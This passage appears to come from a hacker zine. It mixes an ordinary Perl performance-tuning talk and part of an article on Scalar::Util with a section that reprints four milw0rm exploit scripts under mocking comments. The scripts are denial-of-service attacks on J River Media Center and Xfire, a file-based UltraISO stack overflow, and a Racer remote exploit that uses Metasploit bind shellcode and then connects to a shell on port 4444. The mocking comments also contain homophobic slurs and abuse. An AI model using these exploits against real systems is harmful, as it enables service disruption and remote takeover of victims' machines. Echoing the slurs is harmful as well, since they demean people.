isn't reset when you leave a block. This means that to be correct perl has to keep track of it from any match, as perl has no idea when it might be needed. As it involves taking a copy of the matched string, it's expensive for perl to keep track of. If you never mention $&, then perl knows it can cheat and never store it. But if you (or any module) mentions $& anywhere then perl has to keep track of it throughout the script, which slows things down. So it's a good idea to capture the whole match explicitly if that's what you need. $text =~ /.* rules/; $line = $&; # Now every match will copy $& - slow $text =~ /(.* rules)/; $line = $1; # Didn't mention $& - fast avoid use English; use English gives helpful long names to all the punctuation variables. Unfortunately that includes aliasing $& to $MATCH which makes perl think that it needs to copy every match into $&, even if you script never actually uses it. In perl 5.8 you can say use English '-no_match_vars'; to avoid mentioning the naughty "word", but this isn't available in earlier versions of perl. avoid needless captures Are you using parentheses for capturing, or just for grouping? Capturing involves perl copying the matched string into $1 etc, so it all you need is grouping use a the non-capturing (?:...) instead of the capturing (...). /.../o; If you define scalars with building blocks for your regexps, and then make your final regexp by interpolating them, then your final regexp isn't going to change. However, perl doesn't realise this, because it sees that there are interpolated scalars each time it meets your regexp, and has no idea that their contents are the same as before. If your regexp doesn't change, then use the /o flag to tell perl, and it will never waste time checking or recompiling it. but don't blow it You can use the qr// operator to pre-compile your regexps. It often is the easiest way to write regexp components to build up more complex regexps. Using it to build your regexps once is a good idea. But don't screw up (like parrot's assemble.pl did) by telling perl to recompile the same regexp every time you enter a subroutine: sub foo { my $reg1 = qr/.../; my $reg2 = qr/... $reg1 .../; You should pull those two regexp definitions out of the subroutine into package variables, or file scoped lexicals. Devel::DProf You find what is slow by using a profiler. People often guess where they think their program is slow, and get it hopelessly wrong. Use a profiler. Devel::DProf is in the perl core from version 5.6. If you're using an earlier perl you can get it from CPAN. You run your program with -d:DProf perl5.8.0 -d:DProf enc2xs.orig -Q -O -o /dev/null ... which times things and stores the data in a file named tmon.out. Then you run dprofpp to process the tmon.out file, and produce meaningful summary information. This excerpt is the default length and format, but you can use options to change things - see the man page. It also seems to show up a minor bug in dprofpp, because it manages to total things up to get 106%. While that's not right, it doesn't affect the explanation. Total Elapsed Time = 66.85123 Seconds User+System Time = 62.35543 Seconds Exclusive Times %Time ExclSec CumulS #Calls sec/call Csec/c Name 106. 66.70 102.59 218881 0.0003 0.0005 main::enter 49.5 30.86 91.767 6 5.1443 15.294 main::compile_ucm 19.2 12.01 8.333 45242 0.0003 0.0002 main::encode_U 4.74 2.953 1.078 45242 0.0001 0.0000 utf8::unicode_to_native 4.16 2.595 0.718 45242 0.0001 0.0000 utf8::encode 0.09 0.055 0.054 5 0.0109 0.0108 main::BEGIN 0.01 0.008 0.008 1 0.0078 0.0078 Getopt::Std::getopts 0.00 0.000 -0.000 1 0.0000 - Exporter::import 0.00 0.000 -0.000 3 0.0000 - strict::bits 0.00 0.000 -0.000 1 0.0000 - strict::import 0.00 0.000 -0.000 2 0.0000 - strict::unimport At the top of the list, the subroutine enter takes about half the total CPU time, with 200,000 calls, each very fast. That makes it a good candidate to optimise, because all you have to do is make a slight change that gives a small speedup, and that gain will be magnified 200,000 times. [It turned out that enter was tail recursive, and part of the speed gain I got was by making it loop instead] Third on the list is encode_U, which with 45,000 calls is similar, and worth looking at. [Actually, it was trivial code and in the real enc2xs I inlined it] utf8::unicode_to_native and utf8::encode are built-ins, so you won't be able to change that. Don't bother below there, as you've accounted for 90% of total program time, so even if you did a perfect job on everything else, you could only make the program run 10% faster. compile_ucm is trickier - it's only called 6 times, so it's not obvious where to look for what's slow. Maybe there's a loop with many iterations. But now you're guessing, which isn't good. One trick is to break it into several subroutines, just for benchmarking, so that DProf gives you times for different bits. That way you can see where the juicy bits to optimise are. Devel::SmallProf should do line by line profiling, but every time I use it it seems to crash. Benchmark Now you've identified the slow spots, you need to try alternative code to see if you can find something faster. The Benchmark module makes this easy. A particularly good subroutine is cmpthese, which takes code snippets and plots a chart. cmpthese was added to Benchmark with perl 5.6. So to compare two code snippets orig and new by running each for 10000 times you'd do this: use Benchmark ':all'; sub orig { ... } sub new { ... } cmpthese (10000, { orig => /&orig, new => /&new } ); Benchmark runs both, times them, and then prints out a helpful comparison chart: Benchmark: timing 10000 iterations of new, orig... new: 1 wallclock secs ( 0.70 usr + 0.00 sys = 0.70 CPU) @ 14222.22/s (n=10000) orig: 4 wallclock secs ( 3.94 usr + 0.00 sys = 3.94 CPU) @ 2539.68/s (n=10000) Rate orig new orig 2540/s -- -82% new 14222/s 460% -- and it's plain to see that my new code is over 4 times as fast as my original code. What causes slowness in perl? Actually, I didn't tell the whole truth earlier about what causes slowness in perl. [And astute hecklers such as Philip Newton had already told me this] When perl compilers your program it breaks it down into a sequence of operations it must perform, which are usually referred to as ops. So when you ask perl to compute $a = $b + $c it actually breaks it down into these ops: Fetch $b onto the stack Fetch $c onto the stack Add the top two things on the stack together; write the result to the stack Fetch the address of $a Place the thing on the top of stack into that address Computers are fast at simple things like addition. But there is quite a lot of overhead involved in keeping track of "which op am I currently performing" and "where is the next op", and this book-keeping often swamps the time taken to actually run the ops. So often in perl it's the number of ops your program takes to perform its task that is more important than the CPU they use or the RAM it needs. The hit list is Ops CPU RAM So what were my example code snippets that I Benchmarked? It was code to split a line of hex (54726164696e67207374796c652f6d61) into groups of 4 digits (5472 6164 696e ...) , and convert each to a number sub orig { map {hex $_} $line =~ /(....)/g; } sub new { unpack "n*", pack "H*", $line; } The two produce the same results: orig 21618, 24932, 26990, 26400, 29556, 31084, 25903, 28001, 26990, 29793, 26990, 24930, 26988, 26996, 31008, 26223, 29216, 29552, 25957, 25646 new 21618, 24932, 26990, 26400, 29556, 31084, 25903, 28001, 26990, 29793, 26990, 24930, 26988, 26996, 31008, 26223, 29216, 29552, 25957, 25646 but the first one is much slower. Why? Following the data path from right to left, it starts well with a global regexp, which is only one op and therefore a fast way to generate a list of the 4 digit groups. But that map block is actually an implicit loop, so for each 4 digit block it iterates round and repeatedly calls hex. Thats at least one op for every list item. Whereas the second one has no loops in it, implicit or explicit. It uses one pack to convert the hex temporarily into a binary string, and then one unpack to convert that string into a list of numbers. n is big endian 16 bit quantities. I didn't know that - I had to look it up. But when the profiler told me that this part of the original code was a performance bottleneck, the first think that I did was to look at the the pack docs to see if I could use some sort of pack/unpack as a speedier replacement. Ops are bad, m'kay You can ask perl to tell you the ops that it generates for particular code with the Terse backend to the compiler. For example, here's a 1 liner to show the ops in the original code: $ perl -MO=Terse -e'map {hex $_} $line =~ /(....)/g;' LISTOP (0x16d9c8) leave [1] OP (0x16d9f0) enter COP (0x16d988) nextstate LOGOP (0x16d940) mapwhile [2] LISTOP (0x16d8f8) mapstart OP (0x16d920) pushmark UNOP (0x16d968) null UNOP (0x16d7e0) null LISTOP (0x115370) scope OP (0x16bb40) null [174] UNOP (0x16d6e0) hex [1] UNOP (0x16d6c0) null [15] SVOP (0x10e6b8) gvsv GV (0xf4224) *_ PMOP (0x114b28) match /(....)/ UNOP (0x16d7b0) null [15] SVOP (0x16d700) gvsv GV (0x111f10) *line At the bottom you can see how the match /(....)/ is just one op. But the next diagonal line of ops from mapwhile down to the match are all the ops that make up the map. Lots of them. And they get run each time round map's loop. [Note also that the {}s mean that map enters scope each time round the loop. That not a trivially cheap op either] Whereas my replacement code looks like this: $ perl -MO=Terse -e'unpack "n*", pack "H*", $line;' LISTOP (0x16d818) leave [1] OP (0x16d840) enter COP (0x16bb40) nextstate LISTOP (0x16d7d0) unpack OP (0x16d7f8) null [3] SVOP (0x10e6b8) const PV (0x111f94) "n*" LISTOP (0x115370) pack [1] OP (0x16d7b0) pushmark SVOP (0x16d6c0) const PV (0x111f10) "H*" UNOP (0x16d790) null [15] SVOP (0x16d6e0) gvsv GV (0x111f34) *line There are less ops in total. And no loops, so all the ops you see execute only once. :-) [My helpful hecklers pointed out that it's hard to work out what an op is. Good call. There's roughly one op per symbol (function, operator, variable name, and any other bit of perl syntax). So if you golf down the number of functions and operators your program runs, then you'll be reducing the number of ops.] [These were supposed to be the bonus slides. I talked to fast (quelle surprise) and so manage to actually get through the lot with time for questions] Memoize Caches function results MJD's Memoize follows the grand perl tradition by trading memory for speed. You tell Memoize the name(s) of functions you'd like to speed up, and it does symbol table games to transparently intercept calls to them. It looks at the parameters the function was called with, and uses them to decide what to do next. If it hasn't seen a particular set of parameters before, it calls the original function with the parameters. However, before returning the result, it stores it in a hash for that function, keyed by the function's parameters. If it has seen the parameters before, then it just returns the result direct from the hash, without even bothering to call the function. For functions that only calculate This is useful for functions that calculate things with no side effects, slow functions that you often call repeatedly with the same parameters. It's not useful for functions that do things external to the program (such as generating output), nor is it good for very small, fast functions. Can tie cache to a disk file The hash Memoize uses is a regular perl hash. This means that you can tie the hash to a disk file. This allows Memoize to remember things across runs of your program. That way, you could use Memoize in a CGI to cache static content that you only generate on demand (but remember you'll need file locking). The first person who requests something has to wait for the generation routine, but everyone else gets it straight from the cache. You can also arrange for another program to periodically expire results from the cache. As of 5.8 Memoize module has been assimilated into the core. Users of earlier perl can get it from CPAN. Miscellaneous These are quite general ideas for optimisation that aren't particularly perl specific. Pull things out of loops perl's hash lookups are fast. But they aren't as fast as a lexical variable. enc2xs was calling a function each time round a loop based on a hash lookup using $type as the key. The value of $type didn't change, so I pulled the lookup out above the loop into a lexical variable: my $type_func = $encode_types{$type}; and doing it only once was faster. Experiment with number of arguments Something else I found was that enc2xs was calling a function which took several arguments from a small number of places. The function contained code to set defaults if some of the arguments were not supplied. I found that the way the program ran, most of the calls passed in all the values and didn't need the defaults. Changing the function to not set defaults, and writing those defaults out explicitly where needed bought me a speed up. Tail recursion Tail recursion is where the last thing a function does it call itself again with slightly different arguments. It's a common idiom, and some languages can automatically optimise it away. Perl is not one of those languages. So every time a function tail recurses you have another subroutine call [not cheap - Arthur Bergman notes that it is 10 pages of C source, and will blow the instruction cache on a CPU] and re-entering that subroutine again causes more memory to be allocated to store a new set of lexical variables [also not cheap]. perl can't spot that it could just throw away the old lexicals and re-use their space, but you can, so you can save CPU and RAM by re-writing your tail recursive subroutines with loops. In general, trying to reduce recursion by replacing it with iterative algorithms should speed things up. yay for y y, or tr, is the transliteration operator. It's not as powerful as the general purpose regular expression engine, but for the things it can do it is often faster. tr/!// # fastest way to count chars tr doesn't delete characters unless you use the /d flag. If you don't even have any replacement characters then it treats its target as read only. In scalar context it returns the number of characters that matched. It's the fastest way to count the number of occurrences of single characters and character ranges. (ie it's faster than counting the elements returned by m/.../g in list context. But if you just want to see whether one or more of a character is present use m/.../, because it will stop at the u first, whereas tr/// has to go to the end) tr/q/Q/ faster than s/q/Q/g tr is also faster than the regexp engine for doing character-for-character substitutions. tr/a-z//d faster than s/[a-z]//g tr is faster than the regexp engines for doing character range deletions. [When writing the slide I assumed that it would be faster for single character deletions, but I Benchmarked things and found that s///g was faster for them. So never guess timings; always test things. You'll be surprised, but that's better than being wrong] Ops are bad, m'kay Another example lifted straight from enc2xs of something that I managed to accelerate quite a bit by reducing the number of ops run. The code takes a scalar, and prints out each byte as /x followed by 2 digits of hex, as it's generating C source code: #foreach my $c (split(//,$out_bytes)) { # $s .= sprintf "//x%02X",ord($c); #} # 9.5% faster changing that loop to this: $s .= sprintf +("//x%02X" x length $out_bytes), unpack "C*", $out_bytes; The original makes a temporary list with split [not bad in itself - ops are more important than CPU or RAM] and then loops over it. Each time round the loop it executes several ops, including using ord to convert the byte to its numeric value, and then using sprintf with the format "//x%02X" to convert that number to the C source. The new code effectively merges the split and looped ord into one op, using unpack's C format to generate the list of numeric values directly. The more interesting (arguably sick) part is the format to sprintf, which is inside +(...). You can see from the .= in the original that the code is just concatenating the converted form of each byte together. So instead of making sprintf convert each value in turn, only for perl ops to stick them together, I use x to replicate the per-byte format string once for each byte I'm about to convert. There's now one "//x%02X" for each of the numbers in the list passed from unpack to sprintf, so sprintf just does what it's told. And sprintf is faster than perl ops. How to make perl fast enough use the language's fast features You have enormous power at your disposal with regexps, pack, unpack and sprintf. So why not use them? All the pack and unpack code is implemented in pure C, so doesn't have any of the book-keeping overhead of perl ops. sprintf too is pure C, so it's fast. The regexp engine uses its own private bytecode, but it's specially tuned for regexps, so it runs much faster than general perl code. And the implementation of tr has less to do than the regexp engine, so it's faster. For maximum power, remember that you can generate regexps and the formats for pack, unpack and sprintf at run time, based on your data. give the interpreter hints Make it obvious to the interpreter what you're up to. Avoid $&, use (?:...) when you don't need capturing, and put the /o flag on constant regexps. less OPs Try to accomplish your tasks using less operations. If you find you have to optimise an existing program then this is where to start - golf is good, but remember it's run time strokes not source code strokes. less CPU Usually you want to find ways of using less CPU. less RAM but don't forget to think about how your data structures work to see if you can make them use less RAM. -[0x07] # His name is not a joke, but he is ------------------------------ #!/usr/bin/perl ##Credit to n00b for finding this bug..^ ^ ########################################################################## ## #Media Center 11 d0s exploit overly long string. #TiVo server plugin..Runs on port tcp :8070 #Also J. River UPnP Server Version 1.0.34 #is also afected by the same bug which is just a #dos exploit.As we know the port always changes for the #UPnP server so you may have to modify the proof of concept a little #This exploit will deny legitimate user's from using the service #We should see a error with the following msg Upon sucsessfull exploitation. #All 3 of the server plugin's will fail includin the library server which #is set to port :80 by default.The only debug info i was able to collect #at crash time is also provided with the proof of concept. #As you can see from the debug info provided we canot control any memory #Adresses. #Shout's to aelph and every-one who has helped me over the year's. ########################################################################## ### # X Microsoft Visual C ++ Runtime Library # # Buffer overrun detected! # # C:/Program Files/J River/Media Center 11/Media center.exe # # A Buffer overrun has been detected which has corrupted the program's # internal state. The program cannot safely continue execution and must # be now terminated. # Bah fucking shame.. ########################################################################## #### #o/s info: win xp sp.2 Media Center 11.0.309 (not registered) # // DEBUG INFO // # #eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e edi=00000003 #eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 #SharedUserData!SystemCallStub+0x4: #7ffe0304 c3 ret ########################################################################## #### print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's are vuln by n00b /n"; use IO::Socket; # use warnings; use strict; $ip = $ARGV[0]; # my $ip = shift or die usage(); $payload = "/x41"x5500; if(!$ip) # You're a dumb nut { die "you forgot the ip dumb nut/n"; } $port = '8070'; # Dumb nut $protocol = 'tcp'; # Dumb nut, useless variable $socket = IO::Socket::INET->new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Make sure service is running on the port/n"; # Make sure brain is implanted in that light blub you call head print $socket $payload; close($socket); # close $socket # milw0rm.com [2006-09-05] #!/usr/bin/perl #Moderator of http://igniteds.net ########################################################################## #### #X fire version:new Release 1.64 <12th, 2006> ########################################################################## #### # Comments removed due to high level of homosexuality print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th, 2006> /n"; use IO::Socket; # use warnings; use strict; $ip = $ARGV[0]; # my $ip = shift or usage(); # Trying to look leet now? Or did we completely forget the 'x' operator now? $payload = "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41". "/x41/x41/x41/x41/x41/x41/x41/x41/x41/x41"; if(!$ip) # Remember perldoc { die "remember the ip/n"; } $port = '25777'; # DON'T EVER QUOTE INTEGERS AGAIN YOU USELESS PIECE OF SHIT $protocol = 'udp'; # Stop making useless variable $socket = IO::Socket::INET->new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Make sure service is running on the port/n"; print $socket $payload; close($socket); # close $socket; print "client has died h00ha /n"; # Learn2program, then learn2perl # milw0rm.com [2006-10-16] #!/usr/bin/perl ############################################################ #Credit:To n00b for finding this bug and writing poc. ############################################################ #Ultra ISO stack over flow poc code. #Ultra iso is exploitable via opening #a specially crafted Cue file..There is #A limitation that the user must have the bin #file in the same dir as the cue file. #This is the reason i have provided the #Bin file also Command execution is possible #As we can control $ebp and $eip hoooooha. #I will be working on the local exploit #as soon as i get a chance this should be a straight forward #to exploit this as we already gain control of the #$eip register.. #Tested on :win xp service pack 2 #Vendor's web site: http://www.ezbsystems.com/ultraiso # Version affected: UltraISO 8.6.2.2011 ############################################################ #Debug info as follows. ######################################### #Program received signal SIGSEGV, Segmentation fault. #[Switching to thread 1696.0x6d0] #0x41414141 in ?? () ############################################################ #(gdb) i r #eax 0x0 0 #ecx 0x7ce2fc 8184572 #edx 0x1 1 #ebx 0xfe6468 16671848 #esp 0x13ecf8 0x13ecf8 #ebp 0x41414141 0x41414141 #esi 0x0 0 #edi 0x13fa18 1309208 #eip 0x41414141 0x41414141 #eflags 0x10246 66118 #cs 0x1b 27 #ss 0x23 35 #ds 0x23 35 #es 0x23 35 #fs 0x3b 59 #gs 0x0 0 #fctrl 0xffff1273 -60813 #fstat 0xffff0000 -65536 #ftag 0xffffffff -1 #fiseg 0x0 0 #fioff 0x0 0 #foseg 0xffff0000 -65536 #fooff 0x0 0 #---Type <return> to continue, or q <return> to quit--- #fop 0x0 0 #(gdb) ############################################################ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/n"; print "0day Ultra-Iso 8.6.2.2011 stack over flow poc /n"; print "Credits to n00b for finding the bug and writing poc/n"; print "I will be writing a local exploit for this in a few days/n"; print "Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntex/n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/n"; my $CUEFILE="1.cue"; #Do not edit this # How come? Why not? my $BINFILE="1.bin"; #Do not edit this # How come? Why not? my $header= "/x46/x49/x4c/x45/x20/x22"; my $endheader= "/x2e/x42/x49/x4e/x22/x20/x42/x49/x4e/x41/x52/x59/x0d/x0a/x20". "/x54/x52/x41/x43/x4b/x20/x30/x31/x20/x4d/x4f/x44/x45/x31/x2f/x32". "/x33/x35/x32/x0d/x0a/x20/x20/x20/x49/x4e/x44/x45/x58/x20/x30/x31". "/x20/x30/x30/x3a/x30/x30/x3a/x30/x30"; open(CUE, ">$CUEFILE") or die "ERROR:$CUEFILE/n"; # you started off good using lexical variables, why stop now? open(BIN, ">$BINFILE") or die "ERROR:$BINFILE/n"; # YES! File handles are VARIABLES print CUE $header; for ($i = 0; $i < 1024; $i++) { #Fill our buffer # GAY c-style loop, totally unnecessary $buffer.= "/x41"; #For easy of debugging # It's official you forgot about the 'x' operator } print CUE $buffer; for ($i = 0; $i < 100; $i++) { #Fill our buffer # :( $buffer2.= "/x90"; #Fill our bin file with nops..Why not pmsl. } print BIN $buffer2; print CUE $endheader; close(CUE,BIN); # :( sleep(5); # :( print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/n"; # print <<'GAYMESSAGE' print "Files have been created success-fully/n"; # Multiline, quotefree print "Please note you will have to have both 1.cue and 1.bin in the same dir/n"; # uselessness here print "To be able to reproduce the bug open the 1.cue file with ultra~iso/n"; # end with print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/n"; # GAYMESSAGE # milw0rm.com [2007-05-24] #!/usr/bin/perl ###Credit's to n00b. ################################################ #Racer v0.5.3 beta 5 (12-03-07) remote exploit. #Racer is also prone to a buffer over flow in the #server and client.Automatically the game open's #Udp port 26000 and is waiting for a msg buffer. #If we send an overly long buffer we are able to #Control the eip register and esp hold's enough #buffer to have a good size shell code. ############################################### #Tested: Win Xp sp2 English #Vendor's web site: http://www.racer.nl/ #Affected version's: all version's. #Tested on: Racer v0.5.3 beta 5 (12-03-07). #Special thank's to str0ke. ########################### print <<End; # Not bad, still sucky ***************************************************** Racer v0.5.3 beta 5 (12-03-07) remote exploit ===================================================== Credit's to n00b for finding this bug and writing the exploit.This exploit work's for the client and the server. ***************************************************** Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. Educational use only..!! ***************************************************** Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo Luigi Auriemma. ***************************************************** (*)Please wait End sleep 8; # Good, good system("cls"); # GAY GAY use IO::Socket; $ip = $ARGV[0]; # GAY $payload1 = "A"x1001; # USE LEXICAL VARIABLES YOU DUMB SHIT #jmp esp 0x77D8AF0A user32.dll english $jmpcode = "/x0A/xAF/xD8/x77"; #win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 #http://metasploit.com */. $shellcode = "/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x49/x49/x49/x49/x49/x49". "/x49/x48/x49/x49/x49/x49/x49/x49/x49/x49/x49/x49/x51/x5a/x6a/x67". "/x58/x30/x41/x31/x50/x42/x41/x6b/x42/x41/x77/x32/x42/x42/x42/x32". "/x41/x41/x30/x41/x41/x58/x38/x42/x42/x50/x75/x5a/x49/x49/x6c/x72". "/x4a/x48/x6b/x32/x6d/x48/x68/x4c/x39/x39/x6f/x39/x6f/x69/x6f/x43". "/x50/x6e/x6b/x50/x6c/x66/x44/x41/x34/x4c/x4b/x73/x75/x47/x4c/x6c". "/x4b/x43/x4c/x57/x75/x30/x78/x75/x51/x7a/x4f/x4c/x4b/x42/x6f/x34". "/x58/x4e/x6b/x41/x4f/x37/x50/x46/x61/x7a/x4b/x42/x69/x4e/x6b/x46". "/x54/x6c/x4b/x63/x31/x6a/x4e/x50/x31/x49/x50/x4c/x59/x6e/x4c/x6f". "/x74/x49/x50/x32/x54/x74/x47/x6f/x31/x6b/x7a/x44/x4d/x46/x61/x6f". "/x32/x4a/x4b/x4a/x54/x77/x4b/x31/x44/x51/x34/x55/x78/x31/x65/x4b". "/x55/x6c/x4b/x33/x6f/x75/x74/x63/x31/x38/x6b/x35/x36/x4e/x6b/x44". "/x4c/x70/x4b/x4e/x6b/x43/x6f/x55/x4c/x36/x61/x78/x6b/x36/x63/x66". "/x4c/x4e/x6b/x6f/x79/x42/x4c/x31/x34/x57/x6c/x75/x31/x78/x43/x75". "/x61/x39/x4b/x50/x64/x4c/x4b/x57/x33/x34/x70/x4c/x4b/x77/x30/x64". "/x4c/x4c/x4b/x70/x70/x37/x6c/x4c/x6d/x6e/x6b/x61/x50/x74/x48/x31". "/x4e/x30/x68/x6c/x4e/x62/x6e/x44/x4e/x78/x6c/x72/x70/x39/x6f/x79". "/x46/x63/x56/x76/x33/x70/x66/x42/x48/x56/x53/x37/x42/x53/x58/x62". "/x57/x41/x63/x54/x72/x63/x6f/x51/x44/x59/x6f/x5a/x70/x50/x68/x7a". "/x6b/x6a/x4d/x4b/x4c/x47/x4b/x62/x70/x59/x6f/x6e/x36/x71/x4f/x6f". "/x79/x4d/x35/x43/x56/x6b/x31/x4a/x4d/x33/x38/x34/x42/x31/x45/x52". "/x4a/x55/x52/x79/x6f/x6e/x30/x73/x58/x6a/x79/x77/x79/x4c/x35/x4c". "/x6d/x52/x77/x39/x6f/x69/x46/x72/x73/x71/x43/x61/x43/x41/x43/x30". "/x53/x42/x63/x46/x33/x42/x63/x71/x43/x4b/x4f/x58/x50/x71/x76/x30". "/x68/x32/x31/x71/x4c/x65/x36/x41/x43/x6b/x39/x58/x61/x6a/x35/x63". "/x58/x59/x34/x76/x7a/x30/x70/x4b/x77/x61/x47/x49/x6f/x4a/x76/x71". "/x7a/x42/x30/x53/x61/x41/x45/x6b/x4f/x5a/x70/x53/x58/x6e/x44/x6c". "/x6d/x64/x6e/x6d/x39/x36/x37/x49/x6f/x4b/x66/x73/x63/x30/x55/x39". "/x6f/x4e/x30/x52/x48/x4d/x35/x41/x59/x6f/x76/x32/x69/x70/x57/x49". "/x6f/x4e/x36/x66/x30/x66/x34/x30/x54/x43/x65/x4b/x4f/x4a/x70/x4f". "/x63/x63/x58/x39/x77/x50/x79/x68/x46/x64/x39/x36/x37/x39/x6f/x4e". "/x36/x70/x55/x4b/x4f/x6e/x30/x63/x56/x31/x7a/x32/x44/x42/x46/x31". "/x78/x33/x53/x72/x4d/x4d/x59/x78/x65/x50/x6a/x52/x70/x70/x59/x57". "/x59/x38/x4c/x6b/x39/x5a/x47/x31/x7a/x72/x64/x4e/x69/x4b/x52/x70". "/x31/x49/x50/x78/x73/x4e/x4a/x4b/x4e/x71/x52/x56/x4d/x6b/x4e/x72". "/x62/x34/x6c/x4f/x63/x6e/x6d/x33/x4a/x77/x48/x4e/x4b/x6c/x6b/x4c". "/x6b/x55/x38/x32/x52/x6b/x4e/x58/x33/x56/x76/x59/x6f/x70/x75/x43". "/x74/x49/x6f/x7a/x76/x43/x6b/x36/x37/x70/x52/x36/x31/x31/x41/x31". "/x41/x52/x4a/x54/x41/x70/x51/x51/x41/x50/x55/x63/x61/x6b/x4f/x58". "/x50/x73/x58/x4c/x6d/x79/x49/x43/x35/x4a/x6e/x31/x43/x4b/x4f/x7a". "/x76/x71/x7a/x59/x6f/x4b/x4f/x64/x77/x6b/x4f/x38/x50/x4c/x4b/x50". "/x57/x79/x6c/x4c/x43/x5a/x64/x70/x64/x4b/x4f/x4e/x36/x33/x62/x79". "/x6f/x6e/x30/x41/x78/x4c/x30/x6f/x7a/x43/x34/x51/x4f/x50/x53/x79". "/x6f/x4a/x76/x4b/x4f/x4e/x30/x67"; $payload2 = "B"x500; # check it earlier if(!$ip) # Useless { die "remember the ip/n"; } $port = '26000'; # Alright now, you die. $protocol = 'udp'; # :( $socket = IO::Socket::INET->new(PeerAddr=>$ip, PeerPort=>$port, Proto=>$protocol, Timeout=>'1') || die "Make sure service is running on the port/n"; # die "please keep your dirty ape hands off perl. { print $socket $payload1,$jmpcode,$shellcode,$payload2,; print "[+]Sending malicious payload./n"; sleep 2; system("cls"); print "[+]Done !!./n"; close($socket); { sleep 5; print " + Connecting on port 4444 of $host .../n"; system("telnet $ip 4444"); # OMFG! close($socket); } } ## WTF is this doing here? #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # C:/Documents and Settings/****/Desktop/racer053b5> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # milw0rm.com [2007-08-13] -[0x08] # merlyn discusses common tools ---------------------------------- One of my favorite television lines stuck in my slowly aging brain comes from the mid-60's campy Batman television series. Whenever Batman (played by Adam West: I sat next to him during a cross-country flight a few years ago and had a fun conversation) was stuck in a tight situation, he uttered the painfully halting ``must.. get.. to.. my.. utility.. belt'' phrase. Everything he needed to get out of this episode's trouble was in that belt, if somewhat magically. If he needed to repel sharks: there it was, the shark repellant. If he needed to dissolve glue: yep, there's the glue dissolver. What a magical time of television! Perl also has its own ``utility belts'', namely Scalar::Util and List::Util. These modules were added into the core around Perl version 5.8, although you can install them from the CPAN into any modern Perl version. Let's take a look at what our Perl utility belts contain. By default, neither of these modules export any subroutines, so we'll need to ask for these functions explicitly by import. The blessed function of Scalar::Util tells us the classname of a blessed reference, or undef otherwise. For example: use Scalar::Util qw(blessed); blessed "foo"; # undef blessed bless [], "Foo"; # "Foo" blessed bless {}, "Bar"; # "Bar" At first glance, this seems similar to the ref builtin function. However, consider this: ref []; # "ARRAY" blessed []; # undef Yes, for an unblessed reference, ref returns the primitive data type (such as ARRAY or HASH), while blessed returns undef. The dualvar function helps us create a single value that acts like the $! built-in. $! is odd in that it has one value in a numeric context (the error number, such as 13), and a related but different value in a string context (the error string, such as Permission denied). We can create a similar value using dualvar: use Scalar::Util qw(dualvar); my $result = dualvar(13, "Permission Denied"); if ($result == 13) { ... } # true if ($result =~ /denied/i) { ... } # also true! For a more powerful version of this, look at Contextual::Return in the CPAN. This same example would be written: use Contextual::Return; my $result = NUM { 13 } STR { "Permission Denied" }; I'll save the rest of that cool module for another time. I've never used isvstring from Scalar::Util, because vstrings are a deprecated feature, although still supported in version 5.8. However, since I'm the originator of the JAPH, I figure I'll illustrate this using one: use Scalar::Util qw(isvstring); my $japh = v74.117.115.116.32.97.110.111.116.104.101.114.32.80.101.114.108.32.104.97. 99.107.101.114.44; print $japh, "/n"; # prints "Just another Perl hacker,/n" if (isvstring $japh) { ... } # true Apparently, the fact that my JAPH came from a vstring is remembered as part of the string, and isvstring can detect that. Using a string as a number in Perl is well-defined: the string is converted to a number (and cached), and the resulting number is used in the expression. An ugly string that doesn't exactly look like a number converts as a 0, and if warnings are enabled, we get an Argument ... isn't numeric message. Internally, Perl calls looks_like_number to decide how numeric the value might be, and we can get to that at the Perl level as well: use 